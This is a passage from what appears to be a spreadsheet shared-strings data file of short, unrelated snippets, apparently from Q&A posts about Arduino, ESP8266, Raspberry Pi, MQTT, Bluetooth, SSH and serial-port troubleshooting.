I created all the certificates and registered my device (Adafruit huzzah32)
and the documentation says you connect to 
So I do
When I try to connect I use the device path
const char* jwt = "{json web token}";
const char* device = "projects/{project-id}/locations/{cloud-region}/registries/{registry-id}/devices/{device-id}";
Serial.print("Connecting to mqtt");
while (!client.connect(device,"unused",jwt)) {
    Serial.print(".</t>
  </si>
  <si>
    <t>I have been playing with several variations of how to make the code robust so that the python program waits until the arduino is ready to receive.</t>
  </si>
  <si>
    <t>Serial communication that appears at the RX pin is recorded, PWM (analogWrite) values and pin states are maintained, and interrupts will work as they should.</t>
  </si>
  <si>
    <t>As a simple measure of packet verification, I begin each packet with a "magic number".</t>
  </si>
  <si>
    <t>1
avrdude: initialization failed, rc=-1
         Double check connections and try again, or use -F to override
         this check.</t>
  </si>
  <si>
    <t>I've followed all the guides and they say all the same things: get SSH set up, port forward on port 22, and then connect using your external IP address.</t>
  </si>
  <si>
    <t>As an additional wrinkle, we wiresharked our device's connection and publish attempts, not to see the content (since it is TLS 1.2 encrypted) but to see the connection behavior.</t>
  </si>
  <si>
    <t>The "equivalent" of traps in BACnet is the unconfirmed event notification service, which devices may use to broadcast events/alarms.</t>
  </si>
  <si>
    <t>Switch on Bluetooth in your smart phone
bluetoothctl
[bluetooth]# discoverable on
[bluetooth]# pairable on
[bluetooth]# scan on
&gt;&gt;&gt; Wait for your device to appear during scanning process.</t>
  </si>
  <si>
    <t>Otherwise you might want to either run the server seperately(maybe heroku or digitalocean is relevant) or check your pi's firewall(I highly doubt this is the problem for localhost -&gt; localhost connections)</t>
  </si>
  <si>
    <t>I noticed that the buttons remain on the network for a little while (maybe 15-20 seconds) so I added a little bit of wait time between detections (kind of like a debounce filter on a physical switch) to ensure that the same button push wasn't detected twice.</t>
  </si>
  <si>
    <t>I found it in /etc/mysql/mariadb.conf.d/50-server.cnf
Grant privileges to root user
I tried to run this query, but I kept getting syntax errors:
But I did check in the users table of phpmyadmin and found this:
So it seems that the user is set up correctly
Make sure the service is listening on the right port
Allow tcp forwarding
I also set AllowTcpForwarding to 'yes' in my /etc/ssh/sshd_config
As far as I can tell, everything looks correct.</t>
  </si>
  <si>
    <t>When the RFID badge is scanned, it sends the badge number out via the serial out on the Arduino, but I am not sure how I would read the data on the iPhone side of things.</t>
  </si>
  <si>
    <t>I also found this
http://orcs.sebsoft.com/openvision/index.php/8-vision/37-how-to-acquire-data-by-c-from-bluetooth-4-bluetooth-low-energy-ti-ble-keyfob-ti-sensor-tag
I tried starting it up and scanning, but it didn't find any BLE devices.</t>
  </si>
  <si>
    <t>FAILED, proxy is disconnected
128
 - java/security/AccessController.checkPermission(), bci=1
 - com/sun/midp/io/j2me/socket/Protocol.open(), bci=127
 - com/sun/midp/io/j2me/socket/Protocol.openPrim(), bci=4
 - javax/microedition/io/Connector.open(), bci=77
 - javax/microedition/io/Connector.open(), bci=6
 - javax/microedition/io/Connector.open(), bci=3
 - smartgridapidemopi/SmartGridAPIdemoPI.startApp(SmartGridAPIdemoPI.java:48)
 - javax/microedition/midlet/MIDletTunnelImpl.callStartApp(), bci=1
 - com/sun/midp/midlet/MIDletPeer.startApp(), bci=5
 - com/sun/midp/midlet/MIDletStateHandler.startSuite(), bci=264
 - com/sun/midp/main/AbstractMIDletSuiteLoader.startSuite(), bci=38
 - com/sun/midp/main/CldcMIDletSuiteLoader.startSuite(), bci=5
 - com/sun/midp/main/AbstractMIDletSuiteLoader.runMIDletSuite(), bci=132
 - com/sun/midp/main/AppIsolateMIDletSuiteLoader.main(), bci=26
[ERROR] [AMS] iso=1:Sending the notification: com.oracle.midp.proxy.RunCommand@d17b76f0.</t>
  </si>
  <si>
    <t>Output:
checking for nfc
127
127
32639
8355711
result:
127
If I could put the LED working, I have already a transistor with a power converter on the exit of the pin5, so the door can be unlocked.</t>
  </si>
  <si>
    <t>When you disconnect and reconnect there is an extra bit that gets sent to initialize the baud connection, and that was tricking your protocol into working.</t>
  </si>
  <si>
    <t>Try:
Also try running the server script on Windows with Administrator privileges so it can open the port and check your firewall settings on Windows for port 2613.</t>
  </si>
  <si>
    <t>Checking network connection describes how to check internet connectivity, which will consume more time than checking local connectivity.</t>
  </si>
  <si>
    <t>From the logs it looks like you have changed the types of the device IDs between gateway and device, and in some cases a device with id b827eb0a0ee8 has connected as a gateway (shown as just a device in your screen shot) and subsequently been disconnected because it attempts something unauthorised (probably attempting to connect an unregistered device; ie the client ID mix up issue).</t>
  </si>
  <si>
    <t>The following snippet shows how to create and open a default connection to a PostgreSQL database:
    QSqlDatabase db = QSqlDatabase::addDatabase("QPSQL");
    db.setHostName("acidalia");
    db.setDatabaseName("customdb");
    db.setUserName("mojito");
    db.setPassword("J0a1m8");
    bool ok = db.open();
Once the QSqlDatabase object has been created, set the connection parameters with setDatabaseName(), setUserName(), setPassword(), setHostName(), setPort(), and setConnectOptions().</t>
  </si>
  <si>
    <t>The port scan shows that ports 22, 23 and 53 are open, but I don't know the default SSH password (tried root/admin but that does not work) and telnet doesn't work either.</t>
  </si>
  <si>
    <t>I guess the MAC address gets blacklisted and that's why the connection fails.</t>
  </si>
  <si>
    <t>Send us more details: What's fingerprint sensor ?</t>
  </si>
  <si>
    <t>This fingerprint may not match the current fingerprint.</t>
  </si>
  <si>
    <t>You'll need to stop promiscuous mode before you attempt to connect to an access point.</t>
  </si>
  <si>
    <t>Anything more would cause the board to go into a fail mode and the COM port would be inaccessible again
Here is the new code:</t>
  </si>
  <si>
    <t>But I encounter an error and my connection fails when I try to do the connection as a registered device.</t>
  </si>
  <si>
    <t>But in the case that there wasn't any match, I want to display "YOU CANNOT ENTER" on the LCD.</t>
  </si>
  <si>
    <t>"success" : "failed");
          //beginPacket fails if remote ethaddr is unknown.</t>
  </si>
  <si>
    <t>esp8286 is not connecting with my server, the error is
Attempting MQTT connection...failed, rc=-2 try again in 5 seconds
Can't connect to Broker.</t>
  </si>
  <si>
    <t>(i-Rocks or the other usb fingerprint sensor)
It should boot after checking fingerprint.</t>
  </si>
  <si>
    <t>Now, my goal is to use a raspberry pi to access one of my gpio ports, and when One face was detected in my pc then to turn on a led.</t>
  </si>
  <si>
    <t>Switching
  SSH on or off has always required the use of raspi-config or the
  Raspberry Pi Configuration application, but to access those, you need
  a screen and keyboard connected to the Pi itself, which is not the
  case in headless applications.</t>
  </si>
  <si>
    <t>I believe your connection is failing due to authentication error with your API Key  (API key not found in database).</t>
  </si>
  <si>
    <t>A stripped-down version of the sketch that produces the issue is as follows:
When "verified" with F1+, the following is produced in the Output window:
[Starting] Verify sketch - Joystick.ino
[Warning] Output path is not specified.</t>
  </si>
  <si>
    <t>2) Create a simple redbird based proxy:
var redbird = new require('redbird')({
    port: 8080,
    // Specify filenames to default SSL certificates (in case SNI is not supported by the 
    // user's browser)
    ssl: {
        port: 8443,
        key: "certs/dev-key.pem",
        cert: "certs/dev-cert.pem",
    }
});
// Since we will only have one https host, we don't need to specify additional certificates.</t>
  </si>
  <si>
    <t>A more sophisticated data validation routine would check to see the user had entered a valid country code, i.e., that the number of digits entered matched the convention for the country or area specified.</t>
  </si>
  <si>
    <t>I can use the cubex.local on the local network to have ssh and ftp access to the raspberry but when it comes to the esp trying to resolve that address it keeps failing.</t>
  </si>
  <si>
    <t>What i mean is say if my wifi shut off and my bot went offline the code would detect the bot went offline it would attempt to restart the bot- if it failed it would wait 5 mins then try again.</t>
  </si>
  <si>
    <t>I click on "Pair" and then receive the following error message:  Pairing failed - GDBus.Error.AuthenticationFailed: Authentication Failed.</t>
  </si>
  <si>
    <t>Any data
  sent to the input stream side of the socket is acknowledged and then
  silently discarded.</t>
  </si>
  <si>
    <t>Stepping back, DHCP is most likely failing because you are failing to connect to the Wifi network with the correct SSID and password.</t>
  </si>
  <si>
    <t>You might try:
ESP8266-Arduino-cryptolibs - not available through the library manager, so you'd copy this manually into the Arduino libraries folder 
"AWS-SDK-ESP8266" - available through the library manager
There are others that aren't ESP8266-specific; a simple Google search for 'sha256.h esp8266' or 'sha256.h arduino' will find them.</t>
  </si>
  <si>
    <t>Can someone suggest if it is possible in BLE communication to authenticate the central from peripherial before connection is established?</t>
  </si>
  <si>
    <t>The iotf page says:
We are waiting for your device to send us a message
The device ID you have entered is valid, but we are waiting for your
  device to send us a message.</t>
  </si>
  <si>
    <t>AT
OK
AT+CWLAP
+CWLAP:(3,"MYMODEM",-31,"aa:bb:cc:dd:ee:ff",1,21)
OK
AT+CWJAP="MYMODEM","mypassword"
WIFI CONNECTED
WIFI GOT IP
OK
AT+CIPSTART="TCP","192.168.1.2",80
CONNECT
OK
AT+CIPSEND=56
OK
&gt; GET /index.php?temp=10 HTTP/1.1\r\nHost: 192.168.1.2\r\n\r\n
busy s...
Recv 56 bytes
SEND OK
CLOSED
So at this point, message "Temperature is 10 oC."</t>
  </si>
  <si>
    <t>feign.FeignException: status 404 reading DeviceAccessAuthorizationAdminService#isAuthorized(AuthorizationRequest); content:
404Status reportNot FoundThe requested resource (/api/device-mgt/v1.0/admin/authorization) is not available.</t>
  </si>
  <si>
    <t>I've been trying to find a way to login to windows 10 using C# (or any other language) after an event created by an Arduino via Com Port.</t>
  </si>
  <si>
    <t>Sending a confirmed packet or a link check request should elicit a response from the server.</t>
  </si>
  <si>
    <t>Auth response received code: 134
terminate called after throwing an instance of 'OC::OCException'
what():  result_guard(): 26: Invalid Param
Aborted (core dumped)
I guess this error is caused from 'Account Server', Because only this process prints error log (please refer to blow).</t>
  </si>
  <si>
    <t>Plugins provide features like TLS cert file security, dkim, regex selective incoming/outgoing blacklist / whitelist for email addresses and/or domains
If you have experience using postfix this will be a refreshing change
its opensource https://github.com/haraka/Haraka
https://haraka.github.io/manual/tutorials/SettingUpOutbound.html</t>
  </si>
  <si>
    <t>I have set my router to port all ports from 1 - 9999 just to see if it works but I can't ssh onto my pi using the public ip address only my local one works, and I am also unable to access my nginx web server on my pi.</t>
  </si>
  <si>
    <t>Verifying username and password
I now get the error message
'Connecting to 192.168.10.18 using '
The remote connection was not made because the attempted VPN tunnels failed.</t>
  </si>
  <si>
    <t>I have setup MQTT on a Raspberry Pi and configured an Arduino Uno to the broker, but I am seeing the following entry in the /var/log/mosquitto/mosquitto.log file:
The Pi is setup with ETH0 wired to my local LAN and has an IP address of 192.168.1.50
There is also a WiFi AP setup on the Pi.</t>
  </si>
  <si>
    <t>I am trying to communicate with an external GPS device using UART on a Raspberry Pi, but I am having some issues with the default permissions on the serial port.</t>
  </si>
  <si>
    <t>The topic is not valid: use-token-auth 
The topic does not match an allowed rule 2 times in the last 5 minutes  07.02.2017 11:58:16
Closed connection from 93.231.145.115.</t>
  </si>
  <si>
    <t>I am attempting to create a program that can read DTC codes from CAN-Bus devices connected to a Raspberry Pi via a USB to Serial connection.</t>
  </si>
  <si>
    <t>I use AESLib library to encrypt the temperature but I face some issue when I try to send to the sigfox because is uses "AT$SF" that means is sending only in HEX.</t>
  </si>
  <si>
    <t>Following is the output of the command ipconfig:
I've read somewhere that making the subnet mask and IP same for both my laptop and Rpi will work but I don't know how to do it.</t>
  </si>
  <si>
    <t>So I have entered the token along with the server key from the locations highlighted by the arrows in the below photo into the sketch, but not getting any success with the connection.</t>
  </si>
  <si>
    <t>I want to connect raspberry pi model 3 b (that I just received as a prize) to my mac using ethernet cable and ssh
But the following problem occurs always
ssh pi@192.168.x.x
ssh: connect to host 192.168.x.x port 22: Connection refused 
Could someone please help me 
I really want to code on raspberry pi</t>
  </si>
  <si>
    <t>I tried to make some extra locks that would prevent sending data while sending is already in process but no success so far.</t>
  </si>
  <si>
    <t>But till now by creating new ssh connection i got always an Error such as "Access denied" or "No connection could be made bcz the target maschine actively refused it".</t>
  </si>
  <si>
    <t>Whatever framing you use, insure it is robust to address these messages types, promptly validate #1 and rapidly identifying 2-5 and becoming ready for the next frame.</t>
  </si>
  <si>
    <t>This is used to validate a command packet and allow the target to synchronize with the command stream being sent by the host.</t>
  </si>
  <si>
    <t>In theory a DOS attack is also possible by making repeated connection attempts, but this does still leave an opportunity for the legitimate central to connect.</t>
  </si>
  <si>
    <t>Lastly, another consideration is if any pre-emptive code is running on the device, such as interrupts or timers which could inadvertently interfere with the serial output.</t>
  </si>
  <si>
    <t>You have successfully configured  and connected it to the network (configuration of WiFi by providing SSID and security key in web panel).</t>
  </si>
  <si>
    <t>From now on, pressing the Dash button will only give a red light and it will not initiate Wi-Fi connection and therefore no ARP entry.</t>
  </si>
  <si>
    <t>If you connect to the Raspberry Pi from the same network over both, eth0 and wlan0 and issue an ifconfig to take a look at the transmitted and received packets or bytes, you will recognize, that even you connected to the IP for wlan0 most traffic is going through eth0.</t>
  </si>
  <si>
    <t>The UNO unlike some other units has a resealable fuse on it, which is pretty a good way to protect your port, (that green led).</t>
  </si>
  <si>
    <t>My issue seemed to be that the Pi was getting locked into a host-state while using the OTG micro-USB to USB adapter and thus couldn't receive any commands over the "ethernet" USB connection.</t>
  </si>
  <si>
    <t>Not typically, the event mask you used isn't visible, but there are lots of other reasons that the serial port wants to tell you something.</t>
  </si>
  <si>
    <t>You could try to connect to each of them via SSH, but if they are all in different locations they'd need to set up some kind of port forwarding and give the ports and IP addresses.</t>
  </si>
  <si>
    <t>If --apiserver-advertise-address is provided during the setup process, only the endpoints registered from the same subnetwork will work, and load balancing services may stop working.</t>
  </si>
  <si>
    <t>Now, whenever I send a GET to http://windows.computer.IP.address:PORT/SECRET/ the computer hibernates.</t>
  </si>
  <si>
    <t>Now I'm able to reach the internet key with his static ip address but also connecting to internet because the default interface is the wifi.</t>
  </si>
  <si>
    <t>LoWPAN group has defined encapsulation and header compression
  mechanisms that allow IPv6 packets to be sent and received over IEEE
  802.15.4 based networks.</t>
  </si>
  <si>
    <t>It is used for various purposes like Wifi-Internet connection, Bluetooth-Connection, Software-Locking etc.</t>
  </si>
  <si>
    <t>An internet socket that allows direct sending and receiving of raw network packets that contain all headers.</t>
  </si>
  <si>
    <t>For certain protocols which require an explicit confirmation, such as DECNet, accept() can be thought of as merely dequeuing the next connection request and not implying confirmation.</t>
  </si>
  <si>
    <t>http://localhost/myProject/Myloginform.aspx?ReturnUrl=%2fmyProject%2findex.aspx
After successful authentication, user is redirected to ReturnUrl:
http://localhost/myProject/findex.aspx</t>
  </si>
  <si>
    <t>If the handshake is unable to determine a common cipher suite between the client and the server, the connection is aborted.</t>
  </si>
  <si>
    <t>It will email the confirmation token to the registered email id and user can confirm by clicking on the provided link to confirm his/her account.</t>
  </si>
  <si>
    <t>Use the tag packet-sniffers questions regarding network data packet capture and analysis.</t>
  </si>
  <si>
    <t>Instead, they enter their credentials over the encrypted connection that was established during the HTTPS session setup.</t>
  </si>
  <si>
    <t>Database Username: "root"
Database Password: ""
Database Name: "wordpress"
Database Table: "readings"
Table Field to Update: "voltage1"
The query: 
"UPDATE readings SET voltage1='12v' WHERE device_id=T1;"
The Arduino Sketch:
(Obtained from:  https://launchpad.net/mysql-arduino)
Serial Monitor:
IP: 192.168.0.177 
  Connecting...</t>
  </si>
  <si>
    <t>If you want to connect through a proxy, use the proxy server name as the adress you're connecting to, and include the server address as part of your GET request:
The original answer is here.</t>
  </si>
  <si>
    <t>Additionally it appears from the library the server listening port is a private attribute, not publicly changeable, nor is there any method to change it.</t>
  </si>
  <si>
    <t>This is distinct from email verification, which is necessary to determine if a given email address really exists, and (usually) whether a particular person has access to it (e.g.</t>
  </si>
  <si>
    <t>Well, OP already found out (with the help of Olaf's comments concerning where to start looking) what was actually taking up the space, but indeed, there should be an answer, so trying to summarize here:
The space in the data segment is also occupied by anonymous data (literals in code), especially string literals.</t>
  </si>
  <si>
    <t>Besides ensuring that the port is closed, a couple of additional things to note...
Data sent using PySerial can only be of type  (or bytestream for more than 1 byte data).</t>
  </si>
  <si>
    <t>The system will wake up the application via Intent broadcast when the message arrives, as long as the application is set up with the proper broadcast receiver and permissions.</t>
  </si>
  <si>
    <t>You need to quote password and ssid, for instance using:
file.remove("CRED.lua")
file.open("CRED.lua","w+")
temp = "PASS = \""..pass.."\""
file.writeline(temp)
temp = "SSID = \""..ssid.."\""
file.writeline(temp)
file.flush()
temp = nil
file.close()</t>
  </si>
  <si>
    <t>The common RFID readers will not send continuous data of the same card because in the common use case (entry/exit/attendance), normally one tap is to check-in and another tap is to check-out.</t>
  </si>
  <si>
    <t>I spend a significant amount of time on '10k moderation' activities: editing, checking flags, voting to close or delete, not to mention scattering upvotes (and downvotes) to the deserving.</t>
  </si>
  <si>
    <t>Native network encryption gives you the ability to encrypt database connections, without the configuration overhead of TCP/IP and SSL/TLS and without the need to open and listen on different ports.</t>
  </si>
  <si>
    <t>When surprise removal of the device is detected, what would be the best way to stop the serial I/O.</t>
  </si>
  <si>
    <t>I use Arduino Serial Monitor to enter WiFi login and password.</t>
  </si>
  <si>
    <t>Stub does not validate the response, but I would expect "input", "output" to be used.</t>
  </si>
  <si>
    <t xml:space="preserve"> expects string not Connection so you need 
You can also use login@host if you need different users.</t>
  </si>
  <si>
    <t>The Data Explorer uses a read-only data dump from a subset of Stack Exchange websites, updated once every few months, and includes posts, users, badges, tags, suggested edits and anonymized votes.</t>
  </si>
  <si>
    <t>I am not at all a network guru, although I think I know the basics, and I tried to find out using Wireshark if something went wrong with the handshake.</t>
  </si>
  <si>
    <t>I have found many guides that all lead to making eth0 ip address static, which is not my intention.</t>
  </si>
  <si>
    <t>In this case pins of all chips will have addresses in range 0-15.</t>
  </si>
  <si>
    <t>Tried to do a telnet and found that the connection is being blocked by my firewall.</t>
  </si>
  <si>
    <t>There are two addressing modes - direct access and indirect access with address being taken from memory.</t>
  </si>
  <si>
    <t>The ESP 8266 connects to wifi and starts sending data to the server, my question is:
Should each of my ESP 8266 be configured as users on the server and login for posting their data?</t>
  </si>
  <si>
    <t>I used
  wifi connection and I tried turned of modem firewall
What can i do to solve this.</t>
  </si>
  <si>
    <t>Use watchdog timer Solve above issue.And while Debug using Serial monitor keep in mind whenever you start the controller get reinitialize</t>
  </si>
  <si>
    <t>I also had trouble when trying to setup wifi without encryption or WEP encryption so I suggest to use WPA2 or WPA.</t>
  </si>
  <si>
    <t>Run putty and write the address of your pi (in my case it is 192.168.1.24) Log in the Pi using pi as user and your password
I have renamed my device as mypi the default name is raspberrypi And now it is time to start.</t>
  </si>
  <si>
    <t>After you check that, are there any firewalls in place on you
Raspberry Pi that might close down all connections form outside the
network.</t>
  </si>
  <si>
    <t>EDIT:
this following code is stable and working on latest Arduino YUN boards which has linino (doghunter password)
When micro-USB to USB2.0 connects to PC the line Bridge.begin(250000); works
When micro-USB to USB2.0 connects to adapter the line Bridge.begin(250000); works
When micro-USB to fat-USB to USB2.0 to adapter.</t>
  </si>
  <si>
    <t>I would check the DHCP screen on your router to verify the IP addresses of the nodemcu and rpi.</t>
  </si>
  <si>
    <t>After trying everything I could think of to fix this, I've come to the conclusion that the issue is the ESP8266 failing to process the initial handshake from the server.</t>
  </si>
  <si>
    <t>If successful, the application receives a token, and never has to deal with the actual password.</t>
  </si>
  <si>
    <t>PORT     STATE SERVICE
22/tcp   open  ssh
6010/tcp open  x11
6011/tcp open  unknown
6012/tcp open  unknown
8080/tcp open  http-proxy
Update 3
I can write as user pi inside the folder where Swift should store the objects.</t>
  </si>
  <si>
    <t>You can implement IP address restriction on the service that it connects to with the credentials, so even if credentials are compromised, an attacker is very limited in where he can connect from (but you mentioned a DVR, which typically uses UDP traffic, and it's much easier to forge source IP addresses over UDP than over TCP).</t>
  </si>
  <si>
    <t>3- I try with both option (set ESP8266 Wi-Fi SSID and pass, and my Wi-Fi SSID and password), but not found endpoint on the GPIO control app</t>
  </si>
  <si>
    <t>An example would be to turn an LED on if a specific MAC address is detected, and said client is within some power threshold.</t>
  </si>
  <si>
    <t>Probably the spec says somewhere that if a central sees a peripheral device is broadcasting with white-list-only flag set, it wouldn't try to connect if it doesn't recognize that peripheral device.</t>
  </si>
  <si>
    <t>There could still be an input which unsets and sets your input pin faster your loop can detect it so it's not bulletproof.</t>
  </si>
  <si>
    <t>When an alarm goes off, the Intent that had been registered for it is broadcast by the system, automatically starting the target application if it is not already running.</t>
  </si>
  <si>
    <t>Basically my idea is that if the percentValue is between 0-25, one of the relays would turn on, hence only one digital pin would need to be activated.</t>
  </si>
  <si>
    <t>When I print the fingerprints in the sensor, the structure is exactly the same as if they had been added directly from enrolling.</t>
  </si>
  <si>
    <t>This appears to be the case as the credentials from your sketch do work, but there is no record of that device ever even attempting to connect prior to my testing.</t>
  </si>
  <si>
    <t>You cannot block these callbacks with delay for synchronous check due to watchdog timer (WDT).</t>
  </si>
  <si>
    <t>With setting tls cert_reqs: SSL_VERIFY_NONE, gives connection status success with subcribe and publish sucess, but doesnt reflect on server or broker.</t>
  </si>
  <si>
    <t>This activity has a confirm button that when clicked starts the connection process of the ble peripheral to the phone.</t>
  </si>
  <si>
    <t>I developed a pipeline in AWS where I collect CPU Temperature from my notebook via Python 3, send to AWS IoT Core using security protocols, a rule sends data to Cloud Watch and DynamoDB saves it.</t>
  </si>
  <si>
    <t>I also read the specification and tried researching on the internet to find a way: I know that the specification requires BLE Protocol to stop advertising once it has a connection.</t>
  </si>
  <si>
    <t>A quick check on parity masks results in seven masks that always give parity zero on your data.</t>
  </si>
  <si>
    <t>If you keep sending data once the receive buffer is full, it will enter into an illegal state, and that's definitely a bug, IMHO.</t>
  </si>
  <si>
    <t>Consider Cem Kalyoncu's answer about how to properly handle the reading and also do not send a CRLF to the Arduino at the end of the authentication line and you will most probably be fine.</t>
  </si>
  <si>
    <t>With this You can check the quantity of messages without confirmation OK and restart your process of azure or Internet connection.</t>
  </si>
  <si>
    <t>You can use the Android Things  to initiate device pairing or respond to incoming pairing requests with a BluetoothPairingCallback.</t>
  </si>
  <si>
    <t>WebSocket always begins with an upgrade handshake over HTTP, so you do need to have basic HTTP capability.</t>
  </si>
  <si>
    <t>There is really no way to check if someone is listening on the other side of UDP, unless you implement a request/response scheme yourself.</t>
  </si>
  <si>
    <t>And then, you need to check if the port is available, you can add the rules for port 5037 in firewall, please try with following command.</t>
  </si>
  <si>
    <t>Address space randomization hinders some types of security attacks by making it more difficult for an attacker to predict target addresses.</t>
  </si>
  <si>
    <t>Inside /etc/apache2/sites-available/default I've added the following line:
After restarting the webserver when I try to browse to the defined proxy address    
I get the password prompt from the FieldServer device but after authenticating I get an error indicating the initial page cannot be loaded:
Not Found
The requested URL /app/profiles/profiles.htm was not found on this server.</t>
  </si>
  <si>
    <t>I have a Raspberry Pi running Debian7 (Wheezy) connected on "Site A", where the network is managed by a third-party company and where all ports are closed to the Internet (for security reasons).</t>
  </si>
  <si>
    <t>I'm trying to make a device with no internet connection that redirects any connection to its wifi to a unique page, a pirate box like.</t>
  </si>
  <si>
    <t>The errors that I am having through viewing serial windows is "Accept-ecoding gzip" and sometimes being stuck with "something received" and do not respond to any buttons tapped later on.</t>
  </si>
  <si>
    <t>When the sensor passes by for the first time, the user will be required to authorise the connection on the sensor tag by pressing a button.</t>
  </si>
  <si>
    <t>i have a solenoid control hardware that I am trying to use for an Access system, according to the manual of the device i am sending the command to the device and tri to get the status but i am only receiving blank lines.</t>
  </si>
  <si>
    <t>I want to connect a raspberry pi to my ethernet port (no internet involved), so naturally, I need the IP Address.I typed ipconfig/all into the cmd window on my laptop, but when the the listings come up there is no ipv4 address.</t>
  </si>
  <si>
    <t>I have a second Pi that needs a python script that can send data to the first pi...  
IP Addresses, names and passwords have been changed to protect the innocent, but the whole thing is a closed network anyways.</t>
  </si>
  <si>
    <t>I have correctly entered all the credentials in the connection string: the hostname is my computer IP address: 192.168.1.2 and the user I'm using to get connected have all privileges granted.</t>
  </si>
  <si>
    <t>The initial connect was successful and logged on the platform:
I then added an Inject node, deployed again and the wiotp out node remains disconnected.</t>
  </si>
  <si>
    <t>The data is not receive in the Cloud dashboard under Device &gt; Configuration &amp; State History, I can see a yellow warning "Not yet acknowledged by device"
It seems I cannot connect with MQTT, because the data is not sent and I do not know how actually understand where is the mistake.</t>
  </si>
  <si>
    <t>The guide really just has me enter some wifi credentials and past a connection string in the setup portal for my edge device in Azure.</t>
  </si>
  <si>
    <t>The most reliable and possibly the easiest solution is to the use the Arduino Ethernet shield with a physical network connection to your WiFi router.</t>
  </si>
  <si>
    <t>YOU decide how the information is sent if you have control over the information passing over the serial port on your computer.</t>
  </si>
  <si>
    <t>I would recommend verifying the two parts independently, using a separate serial port and serial comms software on the PC.</t>
  </si>
  <si>
    <t>That won't be reliable for at least two reasons:
Broadcast messages are sent three times to ensure receipt by all nodes on the network.</t>
  </si>
  <si>
    <t>I have done a similar thing with my Raspi 2 as well which involved sending myself an email with the ip address of the pi so I could easily ssh/vnc to it.</t>
  </si>
  <si>
    <t>It seems your issue is because you are re-using the same client ID for subsequent connections  
Only one unique connection is allowed per clientID; you can not have two concurrent connections using the same ID.</t>
  </si>
  <si>
    <t>The closest you could get is by hacking into the network using Wireshark, figure out what messages are sent by Alexa to Echo when volume up/down commands are given.</t>
  </si>
  <si>
    <t>The only way to be sure will be to implement a simple protocol that can definitely frame a command to move and validate the data to be sure that what was received was what the PC sent.</t>
  </si>
  <si>
    <t>ie TIMER,50,S;
On receipt, just tokenize incoming string by ";", then by "," (managing multiple messages as you wish depending on your coms).</t>
  </si>
  <si>
    <t>When the PI is the only member on the bus the controller switch to bus_off state, because nobody is acknowledging the messages send and the message will otherwise be send indefinitely, to protect for bus overload of the retransmissions.</t>
  </si>
  <si>
    <t>When modify the code to sleep for two minutes the SDK is unable to service the socket and hence does not receive the CONNACK packet in time.</t>
  </si>
  <si>
    <t>Email validation is the process of deciding whether a given string is a valid email-address or not.</t>
  </si>
  <si>
    <t>inputs outputs
Before you get started, if you haven't created an account and received your free API key, please do so before proceeding with this guide.</t>
  </si>
  <si>
    <t>Push Architechture:- With Release 2.0, MIDP now includes a
server push model whereby MIDlets can
be registered to be activated when a
device receives information from a
server.</t>
  </si>
  <si>
    <t>Note that this second one is a different problem, because it is possible to redirect pings output to a file (while it is not possible to redirect [sudo] Password for user:); but in this case I am unable to send input to the shell.</t>
  </si>
  <si>
    <t>All devices that receive the command will send a response that includes the devices
addressing information, node identifier string (see NI command), and other relevant information.</t>
  </si>
  <si>
    <t>If that IS the case you just need to set username/password in your client configuration like:
Also I would suggest use urlparse.urlparse("broker url") to sanitize/standardize your broker URL
Do reach out in case this doesn't help you.</t>
  </si>
  <si>
    <t>You can turn checksum validation on through Edit &gt; Preferences &gt; Protocols &gt; UDP &gt; Validate UDP checksum if possible.</t>
  </si>
  <si>
    <t>we open device connection to iotedge by adding GatewayHostName to the device connection string as described here https://docs.microsoft.com/de-de/azure/iot-edge/iot-edge-as-gateway
we request data from the real device and send them via azure device identity.</t>
  </si>
  <si>
    <t>Make sure you don't skip changing the IP address mentioned in the second steps if you are debugging from a remote machine
First we need to install php5-dev and php-pear to make pecl available:
Then we just need to create a config file and enable it.</t>
  </si>
  <si>
    <t>The external service is exposed over udp and I need to keep the connection open , one per device, hence why I wanted to have a long running function , to host the udp client.</t>
  </si>
  <si>
    <t>Network protocols include mechanisms for devices to identify and make connections with each other, as well as formatting rules that specify how data is packaged into messages sent and received.</t>
  </si>
  <si>
    <t>What helped was changing the fingerprint in "static const char kFirebaseFingerprint[]" inside "FirebaseHttpClient.h" file from
"C:\Users\xxxxxxxx\Documents\Arduino\libraries\firebase-arduino-master\src"
You can find fingerprint for yours one form "https://www.grc.com/fingerprints.htm" by putting your FIREBASE_HOST ( ie https://xxxxxxx.firebaseio.com/)
PS.</t>
  </si>
  <si>
    <t>Some users have reported success adding their number using the mobile site, https://mobile.twitter.com/settings, which seems to bypass the carrier check at the moment.</t>
  </si>
  <si>
    <t>However, the Receive Client application in the tutorial needs to have port 5671 open (it communicates with IoT Hub using the AMQP protocol) - it maybe that the firewall configuration on your computer, or your corporate firewall blocks this port.</t>
  </si>
  <si>
    <t>You must enable the INT0 interrupt in the General Interrupt Mask Register....
Add the line...
...before you go to sleep and activating the INT0 pin (by default having a low level) should wake the MCU from sleep.</t>
  </si>
  <si>
    <t>Pin must remain open (don't close it until you've really finished with it) otherwise attempts to read the pin would raise the cryptic exception which confused me with Android permissions like internet-use or record-audio permissions.</t>
  </si>
  <si>
    <t>Unfortunately, I have been unsuccessful because I don't know the exact scan codes to send.</t>
  </si>
  <si>
    <t>I already tried to use sudo hcitool cc [BTADDRESS] to connect to my iPhone without authentication, but it looks like the iPhone don't allow those connection to stay open.</t>
  </si>
  <si>
    <t>Have you checked that the firewall is opened for the port used?</t>
  </si>
  <si>
    <t>do
    {
        wdt_reset();
        delay(500);
        refresh();
    } while(doorState == LOW);
    // Turn on the locking LED during the servo movement.</t>
  </si>
  <si>
    <t>Now what I have done in my project:
I have registered my Xbee with the gateway and then it will go to sleep (I have used pin hibernate mode) then it will wake up by a digital pin of the Pro Mini.</t>
  </si>
  <si>
    <t>I noticed that one of my devices are on a closed network, that is the amqp port is blocked.</t>
  </si>
  <si>
    <t>I have DNS setup, port forwarding, and port open on firewall.</t>
  </si>
  <si>
    <t>In case your connection succeeds, you can do the rest of your configuration using this connection over ssh.</t>
  </si>
  <si>
    <t>From there you have total control, you can open the AP, the UDP server, and implement deauthentication.</t>
  </si>
  <si>
    <t>IP Address Management (IPAM): Extended to support role-based access control, allowing for fine-grained control over which users can view or change configurations for DHCP reservations, scopes, IP address blocks, DNS resource records, etc.</t>
  </si>
  <si>
    <t>The IETF standards that describe the Web Push protocol and its message encryption scheme are really useful to understand how to build an application server that sends push notifications to clients and how to encrypt push message payloads.</t>
  </si>
  <si>
    <t>When I am trying to open, I will get a UnauthorizedAccess on the C# side or a "can't open serial" on the arduino side.</t>
  </si>
  <si>
    <t>Connections are normally created by some protocol handshake between the two devices that establishes to both that they are talking to who they expect.</t>
  </si>
  <si>
